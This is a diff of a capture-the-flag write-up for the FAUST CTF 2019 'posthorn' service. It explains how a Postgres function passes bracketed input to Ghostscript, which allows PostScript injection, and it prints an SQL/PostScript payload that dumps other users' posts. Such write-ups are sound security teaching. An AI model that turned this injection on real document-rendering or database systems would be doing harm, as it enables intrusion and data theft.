ENOFLAG/writeups/faustctf2019/posthorn.md

 The docs state:
 > *run* is a convenience operator that combines the functions of _file_ and _exec_

-Inside the sql file, we find: `SELECT format(' (%s)  (%s) ', ...` -> after some deugging, it was clear that the result is then directly interpreted by `gs` (backets being the quotes for strings).
+Inside a called postgress sql function, we find: `SELECT format(' (%s)  (%s) ', ...` -> after some deugging, it was clear that the result is then directly interpreted by `gs` (brackets being the quotes for strings) and stored in a dict.
-That means, anything with brackets we can inject here will allow for PostScript RCE!
+That means, anything with brackets can inject here.

+Full PostScript RCE!

 ## The Exploit

 ![flag output pdf](flag.png)
-To exploit, we posted:
+As initial PoC exploit, we posted:

 ```SQL
 SELECT post FROM post_table WHERE user_id in \(SELECT user_id from user_table where username in \('username', 'username2', 'username_n'\));) sqlgetrow show (nextpost
 ```

-Since psql then formats this to:
+Since the sql function in `psql` (see the patched version below) then formats this to:

 ```PostGress
   (SELECT post FROM post_table WHERE user_id in \(SELECT user_id from user_table where username in \('username', 'username2', 'username_n'\));) sqlgetrow show (nextpost) (some_id)